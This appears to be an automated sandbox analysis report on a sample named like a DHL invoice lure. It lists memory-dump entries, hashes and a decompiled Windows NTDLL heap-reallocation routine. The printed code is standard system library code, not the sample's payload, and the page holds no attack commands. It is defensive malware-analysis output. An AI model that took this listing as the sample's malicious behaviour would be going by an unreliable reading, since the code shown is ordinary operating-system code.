Opcode ID: 243e3ef4e6c06eefb2790cc2ce9b12ca49bbceef8d0a3ea2138ee085234a4fbf
Instruction ID: 555bc036c4a3c54dc11478018ff9d05872c62aef805b164e5b34d3b5a32cb7b3
Opcode Fuzzy Hash: 243e3ef4e6c06eefb2790cc2ce9b12ca49bbceef8d0a3ea2138ee085234a4fbf
Instruction Fuzzy Hash: C390026126182042DA1066684D14B0B000547D0323F91CA19A0244924CC92988616523

Uniqueness

Uniqueness Score: -1.00%

Function 1D7E2E50 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 1D7E2E5A

Memory Dump Source

Source File: 00000003.00000002.18146591431.000000001D770000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D770000, based on PE: true

Associated: 00000003.00000002.18149183497.000000001D899000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.18149218359.000000001D89D000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1d770000_DHL-INVOICE-MBV.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 64b837ad5a87e1f318438401b1af64a7e0c93422608eddbadd156b3a6d86af8f
Instruction ID: 5c90c1ba306e679794c352e9e2f42fcc0b95d19479fede1b0b5087895179f157
Opcode Fuzzy Hash: 64b837ad5a87e1f318438401b1af64a7e0c93422608eddbadd156b3a6d86af8f
Instruction Fuzzy Hash: 599002A139102442D91062584514B0A000587E1321F91C919E1154924DC62DCC527127

Uniqueness

Uniqueness Score: -1.00%

Function 1D7E2ED0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 1D7E2EDA

Memory Dump Source

Source File: 00000003.00000002.18146591431.000000001D770000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D770000, based on PE: true

Associated: 00000003.00000002.18149183497.000000001D899000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.18149218359.000000001D89D000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1d770000_DHL-INVOICE-MBV.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c62d8724b04ee5c9d30d3265cdb3ec9fb2cd8b76466643b51f592e72da2a29b5
Instruction ID: cb8dbd7ab7e395985dd37136833413e2a11e54c57bb5ac527a21e0c2a7a71a56
Opcode Fuzzy Hash: c62d8724b04ee5c9d30d3265cdb3ec9fb2cd8b76466643b51f592e72da2a29b5
Instruction Fuzzy Hash: 679002616510204249507268894490A40056BE1231791CA25A0A88920DC56D88656667

Uniqueness

Uniqueness Score: -1.00%

Function 1D7E2EB0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 1D7E2EBA

Memory Dump Source

Source File: 00000003.00000002.18146591431.000000001D770000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D770000, based on PE: true

Associated: 00000003.00000002.18149183497.000000001D899000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.18149218359.000000001D89D000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1d770000_DHL-INVOICE-MBV.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: de16a19f68defca99b6521dbf15bb3dc78b1db46b51ce50558b642f4ccdabc64
Instruction ID: 7c6dfd724f112465ea2a5f13b6a3ee4c3f09bb4a987e4631f377451664f8786e
Opcode Fuzzy Hash: de16a19f68defca99b6521dbf15bb3dc78b1db46b51ce50558b642f4ccdabc64
Instruction Fuzzy Hash: 4390027125142402D9106258491470F000547D0322F91C915A1254925DC63988517573

Uniqueness

Uniqueness Score: -1.00%

Function 1D7E29F0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 1D7E29FA

Memory Dump Source

Source File: 00000003.00000002.18146591431.000000001D770000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D770000, based on PE: true

Associated: 00000003.00000002.18149183497.000000001D899000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.18149218359.000000001D89D000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1d770000_DHL-INVOICE-MBV.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c8c83974b5b854b2c539b258a0b021b1b86a0661565a54d927135b10c536a9b4
Instruction ID: c913b028df4b2f2dc4978c6632585807400f7d71b44fe9a095fa7742452c6723
Opcode Fuzzy Hash: c8c83974b5b854b2c539b258a0b021b1b86a0661565a54d927135b10c536a9b4
Instruction Fuzzy Hash: A6900265261020030915A658070450B004647D5371391C925F1105920CD63588616123

Uniqueness

Uniqueness Score: -1.00%

Function 1D7E2B10 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 1D7E2B1A

Memory Dump Source

Source File: 00000003.00000002.18146591431.000000001D770000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D770000, based on PE: true

Associated: 00000003.00000002.18149183497.000000001D899000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.18149218359.000000001D89D000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1d770000_DHL-INVOICE-MBV.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c5ec6bafe8d019ef972ef70f6252782508289f908f86770cdb6d0e29a18364b0
Instruction ID: 78c5161045042f493d5e91263f8b686c4f6c0f0ee8a6c4b3c92555bc0b945b80
Opcode Fuzzy Hash: c5ec6bafe8d019ef972ef70f6252782508289f908f86770cdb6d0e29a18364b0
Instruction Fuzzy Hash: 0990027125102802D9907258450464E000547D1321FD1C919A0115A24DCA298A5977A3

Uniqueness

Uniqueness Score: -1.00%

Function 1D7E2BC0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 1D7E2BCA

Memory Dump Source

Source File: 00000003.00000002.18146591431.000000001D770000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D770000, based on PE: true

Associated: 00000003.00000002.18149183497.000000001D899000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.18149218359.000000001D89D000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1d770000_DHL-INVOICE-MBV.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7fdcdbedfb9dea9e890f0acedab3e8472fdba9ade3d47ca4da1cdad181721549
Instruction ID: 77cf1dc084a2dbc95be296df0ad901d81cd2d06beb4b519466810901d923c1e4
Opcode Fuzzy Hash: 7fdcdbedfb9dea9e890f0acedab3e8472fdba9ade3d47ca4da1cdad181721549
Instruction Fuzzy Hash: 7090027125102402D9106698550864A000547E0321F91D915A5114925EC67988917133

Uniqueness

Uniqueness Score: -1.00%

Function 1D7E2B90 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 1D7E2B9A

Memory Dump Source

Source File: 00000003.00000002.18146591431.000000001D770000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D770000, based on PE: true

Associated: 00000003.00000002.18149183497.000000001D899000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.18149218359.000000001D89D000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1d770000_DHL-INVOICE-MBV.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 50c21d0d3ac7fb38a5809a68a4deda192aca8f9316c81870fa207d8cf443bbe2
Instruction ID: 89fe89225992e9eeb6ae5ad6ff3ae5ba044c99c93627ffb84f15c68f9256b082
Opcode Fuzzy Hash: 50c21d0d3ac7fb38a5809a68a4deda192aca8f9316c81870fa207d8cf443bbe2
Instruction Fuzzy Hash: A89002712510A802D9206258850474E000547D0321F95CD15A4514A28DC6A988917123

Uniqueness

Uniqueness Score: -1.00%

Function 1D7E2A80 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 1D7E2A8A

Memory Dump Source

Source File: 00000003.00000002.18146591431.000000001D770000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D770000, based on PE: true

Associated: 00000003.00000002.18149183497.000000001D899000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.18149218359.000000001D89D000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1d770000_DHL-INVOICE-MBV.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5c3f5f0d0bdf858bd95042eb90ced049503f59967064452131d1439f8d7484a7
Instruction ID: 089ac465efd28c236e863790fcfc6a171fa77272c36ac25ded4ae7fa47446a95
Opcode Fuzzy Hash: 5c3f5f0d0bdf858bd95042eb90ced049503f59967064452131d1439f8d7484a7
Instruction Fuzzy Hash: 0C9002A12520200349157258451461A400A47E0221B91C925E1104960DC53988917127

Uniqueness

Uniqueness Score: -1.00%

Function 1D7E34E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1D7E34EA

Memory Dump Source

Source File: 00000003.00000002.18146591431.000000001D770000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D770000, based on PE: true

Associated: 00000003.00000002.18149183497.000000001D899000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.18149218359.000000001D89D000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1d770000_DHL-INVOICE-MBV.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 88704587353e4242f40dcccef633a703af3c7ebef0dd754d2eda4642a6c6cba6
Instruction ID: 392b83d0cc18838ec79ee6d1ebc13c2999285a95aafc0641c50d260b5306389b
Opcode Fuzzy Hash: 88704587353e4242f40dcccef633a703af3c7ebef0dd754d2eda4642a6c6cba6
Instruction Fuzzy Hash: B190027165512402D9106258461470A100547D0221FA1CD15A0514938DC7A9895175A3

Uniqueness

Uniqueness Score: -1.00%

Function 1D7E2B2A Relevance: 1.5, APIs: 1, Instructions: 8
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 1D7E2B44

Memory Dump Source

Source File: 00000003.00000002.18146591431.000000001D770000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D770000, based on PE: true

Associated: 00000003.00000002.18149183497.000000001D899000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.18149218359.000000001D89D000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1d770000_DHL-INVOICE-MBV.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e36f83425689cfd1c8576ff7e74ae904596db05f36c12be1ee1ed58c17db8869
Instruction ID: a7d221d721ce396a93f34ffd94f610976a6ba7f953a0b8bbb7ae0fe73bc3d9b6
Opcode Fuzzy Hash: e36f83425689cfd1c8576ff7e74ae904596db05f36c12be1ee1ed58c17db8869
Instruction Fuzzy Hash: 54B09B719454D5CDDA11E760470871B790067D0761F55C556D1560651E477CC091F177

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 1D84FDF4 Relevance: 16.1, APIs: 1, Strings: 8, Instructions: 348
timeCOMMONCrypto

Download Yara Rule

C-Code - Quality: 64%

			E1D84FDF4(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t130;
				signed int _t132;
				intOrPtr _t138;
				intOrPtr _t139;
				signed int _t149;
				signed int _t150;
				intOrPtr _t151;
				signed int _t152;
				intOrPtr _t155;
				intOrPtr _t159;
				intOrPtr _t172;
				signed int _t173;
				signed int _t174;
				signed char _t177;
				signed int _t178;
				signed int _t183;
				void* _t184;
				signed char _t192;
				signed int _t193;
				intOrPtr _t195;
				intOrPtr _t199;
				signed int _t209;
				signed int _t226;
				signed char _t236;
				intOrPtr _t240;
				signed int* _t248;
				signed int _t253;
				signed int _t255;
				signed int _t267;
				signed int _t278;
				signed int* _t279;
				intOrPtr* _t283;
				void* _t284;
				void* _t286;

				_push(0x40);
				_push(0x1d87d430);
				E1D7F7BE4(__ebx, __edi, __esi);
				_t281 = __ecx;
				 *((intOrPtr*)(_t284 - 0x3c)) = __ecx;
				 *((char*)(_t284 - 0x19)) = 0;
				 *(_t284 - 0x24) = 0;
				if(( *(__ecx + 0x44) & 0x01000000) == 0) {
					 *((intOrPtr*)(_t284 - 4)) = 0;
					 *((intOrPtr*)(_t284 - 4)) = 1;
					_t130 = E1D797662("RtlReAllocateHeap");
					__eflags = _t130;
					if(_t130 == 0) {
						L72:
						 *(_t284 - 0x24) = 0;
						L73:
						 *((intOrPtr*)(_t284 - 4)) = 0;
						 *((intOrPtr*)(_t284 - 4)) = 0xfffffffe;
						L1D8502E6(_t281);
						_t132 =  *(_t284 - 0x24);
						goto L75;
					}
					_t236 =  *(__ecx + 0x44) | __edx;
					 *(_t284 - 0x30) = _t236;
					 *(_t284 - 0x34) = _t236 | 0x10000100;
					__eflags =  *(_t284 + 0xc);
					if( *(_t284 + 0xc) == 0) {
						_t267 = 1;
						__eflags = 1;
					} else {
						_t267 =  *(_t284 + 0xc);
					}
					_t138 = ( *((intOrPtr*)(_t281 + 0x94)) + _t267 &  *(_t281 + 0x98)) + 8;
					 *((intOrPtr*)(_t284 - 0x40)) = _t138;
					__eflags = _t138 -  *(_t284 + 0xc);
					if(_t138 <  *(_t284 + 0xc)) {
						L68:
						_t139 =  *[fs:0x30];
						__eflags =  *(_t139 + 0xc);
						if( *(_t139 + 0xc) == 0) {
							_push("HEAP: ");
							E1D79B910();
						} else {
							E1D79B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push( *((intOrPtr*)(_t281 + 0x78)));
						E1D79B910("Invalid allocation size - %Ix (exceeded %Ix)\n",  *(_t284 + 0xc));
						goto L72;
					}
					__eflags = _t138 -  *((intOrPtr*)(_t281 + 0x78));
					if(_t138 >  *((intOrPtr*)(_t281 + 0x78))) {
						goto L68;
					}
					 *(_t284 - 0x20) = 0;
					__eflags = _t236 & 0x00000001;
					if((_t236 & 0x00000001) == 0) {
						E1D7AFED0( *((intOrPtr*)(_t281 + 0xc8)));
						 *((char*)(_t284 - 0x19)) = 1;
						_t226 =  *(_t284 - 0x30) | 0x10000101;
						__eflags = _t226;
						 *(_t284 - 0x34) = _t226;
					}
					E1D850835(_t281, 0);
					_t277 =  *((intOrPtr*)(_t284 + 8));
					_t269 = _t277 - 8;
					__eflags =  *((char*)(_t269 + 7)) - 5;
					if( *((char*)(_t269 + 7)) == 5) {
						_t269 = _t269 - (( *(_t269 + 6) & 0x000000ff) << 3);
						__eflags = _t269;
					}
					 *(_t284 - 0x2c) = _t269;
					 *(_t284 - 0x28) = _t269;
					_t240 = _t281;
					_t149 = E1D79753F(_t240, _t269, "RtlReAllocateHeap");
					__eflags = _t149;
					if(_t149 == 0) {
						L53:
						_t150 =  *(_t284 - 0x24);
						__eflags = _t150;
						if(_t150 == 0) {
							goto L73;
						}
						__eflags = _t150 -  *0x1d8947c8; // 0x0
						_t151 =  *[fs:0x30];
						if(__eflags != 0) {
							_t152 =  *(_t151 + 0x68);
							 *(_t284 - 0x48) = _t152;
							__eflags = _t152 & 0x00000800;
							if((_t152 & 0x00000800) == 0) {
								goto L73;
							}
							__eflags =  *(_t284 - 0x20) -  *0x1d8947cc; // 0x0
							if(__eflags != 0) {
								goto L73;
							}
							__eflags =  *((intOrPtr*)(_t281 + 0x7c)) -  *0x1d8947ce; // 0x0
							if(__eflags != 0) {
								goto L73;
							}
							_t155 =  *[fs:0x30];
							__eflags =  *(_t155 + 0xc);
							if( *(_t155 + 0xc) == 0) {
								_push("HEAP: ");
								E1D79B910();
							} else {
								E1D79B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push(L1D84823A(_t281,  *(_t284 - 0x20)));
							_push( *(_t284 + 0xc));
							E1D79B910("Just reallocated block at %p to 0x%Ix bytes with tag %ws\n",  *(_t284 - 0x24));
							L59:
							_t159 =  *[fs:0x30];
							__eflags =  *((char*)(_t159 + 2));
							if( *((char*)(_t159 + 2)) != 0) {
								 *0x1d8947a1 = 1;
								 *0x1d894100 = 0;
								asm("int3");
								 *0x1d8947a1 = 0;
							}
							goto L73;
						}
						__eflags =  *(_t151 + 0xc);
						if( *(_t151 + 0xc) == 0) {
							_push("HEAP: ");
							E1D79B910();
						} else {
							E1D79B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push( *(_t284 + 0xc));
						E1D79B910("Just reallocated block at %p to %Ix bytes\n",  *0x1d8947c8);
						goto L59;
					} else {
						__eflags = _t277 -  *0x1d8947c8; // 0x0
						_t172 =  *[fs:0x30];
						if(__eflags != 0) {
							_t173 =  *(_t172 + 0x68);
							 *(_t284 - 0x44) = _t173;
							__eflags = _t173 & 0x00000800;
							if((_t173 & 0x00000800) == 0) {
								L38:
								_t174 = E1D7B2710(_t281,  *(_t284 - 0x34), _t277,  *(_t284 + 0xc));
								 *(_t284 - 0x24) = _t174;
								__eflags = _t174;
								if(_t174 != 0) {
									_t75 = _t174 - 8; // -8
									_t278 = _t75;
									__eflags =  *((char*)(_t278 + 7)) - 5;
									if( *((char*)(_t278 + 7)) == 5) {
										_t278 = _t278 - (( *(_t278 + 6) & 0x000000ff) << 3);
										__eflags = _t278;
									}
									_t248 = _t278;
									 *(_t284 - 0x28) = _t278;
									__eflags =  *(_t281 + 0x4c);
									if( *(_t281 + 0x4c) != 0) {
										 *_t278 =  *_t278 ^  *(_t281 + 0x50);
										__eflags =  *(_t278 + 3) - (_t248[0] ^ _t248[0] ^  *_t248);
										if(__eflags != 0) {
											_push(_t248);
											_t269 = _t278;
											E1D85D646(0, _t281, _t278, _t278, _t281, __eflags);
										}
									}
									__eflags =  *(_t278 + 2) & 0x00000002;
									if(( *(_t278 + 2) & 0x00000002) == 0) {
										_t177 =  *(_t278 + 3);
										 *(_t284 - 0x1b) = _t177;
										_t178 = _t177 & 0x000000ff;
									} else {
										_t183 = E1D7D3AE9(_t278);
										 *(_t284 - 0x30) = _t183;
										__eflags =  *(_t281 + 0x40) & 0x08000000;
										if(( *(_t281 + 0x40) & 0x08000000) == 0) {
											 *_t183 = 0;
										} else {
											_t184 = E1D7CFDB9(1, _t269);
											_t253 =  *(_t284 - 0x30);
											 *_t253 = _t184;
											_t183 = _t253;
										}
										_t178 =  *((intOrPtr*)(_t183 + 2));
									}
									 *(_t284 - 0x20) = _t178;
									__eflags =  *(_t281 + 0x4c);
									if( *(_t281 + 0x4c) != 0) {
										 *(_t278 + 3) =  *(_t278 + 2) ^  *(_t278 + 1) ^  *_t278;
										 *_t278 =  *_t278 ^  *(_t281 + 0x50);
										__eflags =  *_t278;
									}
								}
								E1D850D24(_t281);
								__eflags = 0;
								E1D850835(_t281, 0);
								goto L53;
							}
							__eflags =  *0x1d8947cc;
							if( *0x1d8947cc == 0) {
								goto L38;
							}
							_t279 =  *(_t284 - 0x28);
							_t269 =  *(_t284 - 0x2c);
							__eflags =  *(_t281 + 0x4c);
							if( *(_t281 + 0x4c) != 0) {
								 *_t279 =  *_t279 ^  *(_t281 + 0x50);
								__eflags = _t279[0] - ( *(_t269 + 2) ^  *(_t269 + 1) ^  *_t269);
								if(__eflags != 0) {
									_push(_t240);
									E1D85D646(0, _t281, _t279, _t279, _t281, __eflags);
									_t269 =  *(_t284 - 0x2c);
								}
							}
							__eflags = _t279[0] & 0x00000002;
							if((_t279[0] & 0x00000002) == 0) {
								_t192 = _t279[0];
								 *(_t284 - 0x1a) = _t192;
								_t193 = _t192 & 0x000000ff;
							} else {
								_t209 = E1D7D3AE9(_t279);
								 *(_t284 - 0x30) = _t209;
								_t193 =  *(_t209 + 2) & 0x0000ffff;
							}
							_t255 = _t193;
							 *(_t284 - 0x20) = _t193;
							__eflags =  *(_t281 + 0x4c);
							if( *(_t281 + 0x4c) != 0) {
								_t279[0] =  *(_t269 + 2) ^  *(_t269 + 1) ^  *_t269;
								 *_t279 =  *_t279 ^  *(_t281 + 0x50);
								__eflags =  *_t279;
							}
							__eflags = _t255;
							if(_t255 == 0) {
								L37:
								_t277 =  *((intOrPtr*)(_t284 + 8));
							} else {
								__eflags = _t255 -  *0x1d8947cc; // 0x0
								if(__eflags != 0) {
									goto L37;
								}
								__eflags =  *((intOrPtr*)(_t281 + 0x7c)) -  *0x1d8947ce; // 0x0
								if(__eflags != 0) {
									goto L37;
								}
								_t195 =  *[fs:0x30];
								__eflags =  *(_t195 + 0xc);
								if( *(_t195 + 0xc) == 0) {
									_push("HEAP: ");
									E1D79B910();
								} else {
									E1D79B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_t269 =  *(_t284 - 0x20);
								_push(L1D84823A(_t281,  *(_t284 - 0x20)));
								_push( *(_t284 + 0xc));
								_t277 =  *((intOrPtr*)(_t284 + 8));
								E1D79B910("About to rellocate block at %p to 0x%Ix bytes with tag %ws\n",  *((intOrPtr*)(_t284 + 8)));
								_t286 = _t286 + 0x10;
								L18:
								_t199 =  *[fs:0x30];
								__eflags =  *((char*)(_t199 + 2));
								if( *((char*)(_t199 + 2)) != 0) {
									 *0x1d8947a1 = 1;
									 *0x1d894100 = 0;
									asm("int3");
									 *0x1d8947a1 = 0;
								}
							}
							goto L38;
						}
						__eflags =  *(_t172 + 0xc);
						if( *(_t172 + 0xc) == 0) {
							_push("HEAP: ");
							E1D79B910();
						} else {
							E1D79B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push( *(_t284 + 0xc));
						E1D79B910("About to reallocate block at %p to %Ix bytes\n",  *0x1d8947c8);
						_t286 = _t286 + 0xc;
						goto L18;
					}
				} else {
					_t283 =  *0x1d89374c; // 0x0
					 *0x1d8991e0(__ecx, __edx,  *((intOrPtr*)(_t284 + 8)),  *(_t284 + 0xc));
					_t132 =  *_t283();
					L75:
					 *[fs:0x0] =  *((intOrPtr*)(_t284 - 0x10));
					return _t132;
				}
			}

0x1d84fdf4
0x1d84fdf6
0x1d84fdfb
0x1d84fe02
0x1d84fe04
0x1d84fe09
0x1d84fe0c
0x1d84fe16
0x1d84fe35
0x1d84fe38
0x1d84fe46
0x1d84fe4b
0x1d84fe4d
0x1d850277
0x1d850277
0x1d85027a
0x1d85027a
0x1d8502c2
0x1d8502c9
0x1d8502ce
0x00000000
0x1d8502ce
0x1d84fe56
0x1d84fe58
0x1d84fe62
0x1d84fe65
0x1d84fe69
0x1d84fe72
0x1d84fe72
0x1d84fe6b
0x1d84fe6b
0x1d84fe6b
0x1d84fe81
0x1d84fe84
0x1d84fe87
0x1d84fe8a
0x1d850231
0x1d850231
0x1d850237
0x1d85023a
0x1d850259
0x1d85025e
0x1d85023c
0x1d850251
0x1d850256
0x1d850264
0x1d85026f
0x00000000
0x1d850274
0x1d84fe90
0x1d84fe93
0x00000000
0x00000000
0x1d84fe9b
0x1d84fe9f
0x1d84fea2
0x1d84feaa
0x1d84feaf
0x1d84feb6
0x1d84feb6
0x1d84febb
0x1d84febb
0x1d84fec2
0x1d84fec7
0x1d84feca
0x1d84fecd
0x1d84fed1
0x1d84feda
0x1d84feda
0x1d84feda
0x1d84fedc
0x1d84fedf
0x1d84fee7
0x1d84fee9
0x1d84feee
0x1d84fef0
0x1d850122
0x1d850122
0x1d850125
0x1d850127
0x00000000
0x00000000
0x1d85012d
0x1d850133
0x1d850139
0x1d8501a7
0x1d8501aa
0x1d8501ad
0x1d8501b2
0x00000000
0x00000000
0x1d8501bc
0x1d8501c3
0x00000000
0x00000000
0x1d8501cd
0x1d8501d4
0x00000000
0x00000000
0x1d8501da
0x1d8501e0
0x1d8501e3
0x1d850202
0x1d850207
0x1d8501e5
0x1d8501fa
0x1d8501ff
0x1d850218
0x1d850219
0x1d850224
0x1d85017e
0x1d85017e
0x1d850184
0x1d850188
0x1d85018e
0x1d850195
0x1d85019b
0x1d85019c
0x1d85019c
0x00000000
0x1d850188
0x1d85013b
0x1d85013e
0x1d85015d
0x1d850162
0x1d850140
0x1d850155
0x1d85015a
0x1d850168
0x1d850176
0x00000000
0x1d84fef6
0x1d84fef6
0x1d84fefc
0x1d84ff02
0x1d84ff70
0x1d84ff73
0x1d84ff76
0x1d84ff7b
0x1d850068
0x1d850070
0x1d850075
0x1d850078
0x1d85007a
0x1d850080
0x1d850080
0x1d850083
0x1d850087
0x1d850090
0x1d850090
0x1d850090
0x1d850092
0x1d850094
0x1d850097
0x1d85009a
0x1d85009f
0x1d8500a9
0x1d8500ac
0x1d8500ae
0x1d8500af
0x1d8500b3
0x1d8500b3
0x1d8500ac
0x1d8500b8
0x1d8500bc
0x1d8500ec
0x1d8500ef
0x1d8500f2
0x1d8500be
0x1d8500c0
0x1d8500c5
0x1d8500ca
0x1d8500d1
0x1d8500e3
0x1d8500d3
0x1d8500d4
0x1d8500d9
0x1d8500dc
0x1d8500df
0x1d8500df
0x1d8500e6
0x1d8500e6
0x1d8500f5
0x1d8500f9
0x1d8500fc
0x1d850108
0x1d85010e
0x1d85010e
0x1d85010e
0x1d8500fc
0x1d850114
0x1d850119
0x1d85011d
0x00000000
0x1d85011d
0x1d84ff81
0x1d84ff88
0x00000000
0x00000000
0x1d84ff8e
0x1d84ff91
0x1d84ff94
0x1d84ff97
0x1d84ff9c
0x1d84ffa6
0x1d84ffa9
0x1d84ffab
0x1d84ffb0
0x1d84ffb5
0x1d84ffb5
0x1d84ffa9
0x1d84ffb8
0x1d84ffbc
0x1d84ffce
0x1d84ffd1
0x1d84ffd4
0x1d84ffbe
0x1d84ffc0
0x1d84ffc5
0x1d84ffc8
0x1d84ffc8
0x1d84ffd7
0x1d84ffd9
0x1d84ffdd
0x1d84ffe0
0x1d84ffea
0x1d84fff0
0x1d84fff0
0x1d84fff0
0x1d84fff2
0x1d84fff5
0x1d850065
0x1d850065
0x1d84fff7
0x1d84fff7
0x1d84fffe
0x00000000
0x00000000
0x1d850004
0x1d85000b
0x00000000
0x00000000
0x1d85000d
0x1d850013
0x1d850016
0x1d850035
0x1d85003a
0x1d850018
0x1d85002d
0x1d850032
0x1d850040
0x1d85004b
0x1d85004c
0x1d85004f
0x1d850058
0x1d85005d
0x1d84ff47
0x1d84ff47
0x1d84ff4d
0x1d84ff51
0x1d84ff57
0x1d84ff5e
0x1d84ff64
0x1d84ff65
0x1d84ff65
0x1d84ff51
0x00000000
0x1d84fff5
0x1d84ff04
0x1d84ff07
0x1d84ff26
0x1d84ff2b
0x1d84ff09
0x1d84ff1e
0x1d84ff23
0x1d84ff31
0x1d84ff3f
0x1d84ff44
0x00000000
0x1d84ff44
0x1d84fe18
0x1d84fe20
0x1d84fe28
0x1d84fe2e
0x1d8502d1
0x1d8502d4
0x1d8502e0
0x1d8502e0

APIs

RtlDebugPrintTimes.NTDLL ref: 1D84FE28

Strings

HEAP[%wZ]: , xrefs: 1D84FF19, 1D850028, 1D850150, 1D8501F5, 1D85024C
Invalid allocation size - %Ix (exceeded %Ix), xrefs: 1D85026A
Just reallocated block at %p to 0x%Ix bytes with tag %ws, xrefs: 1D85021F
HEAP: , xrefs: 1D84FF26, 1D850035, 1D85015D, 1D850202, 1D850259
RtlReAllocateHeap, xrefs: 1D84FE3F, 1D84FEE2
About to rellocate block at %p to 0x%Ix bytes with tag %ws, xrefs: 1D850053
About to reallocate block at %p to %Ix bytes, xrefs: 1D84FF3A
Just reallocated block at %p to %Ix bytes, xrefs: 1D850171

Memory Dump Source

Source File: 00000003.00000002.18146591431.000000001D770000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D770000, based on PE: true

Associated: 00000003.00000002.18149183497.000000001D899000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.18149218359.000000001D89D000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1d770000_DHL-INVOICE-MBV.jbxd

Similarity

API ID: DebugPrintTimes
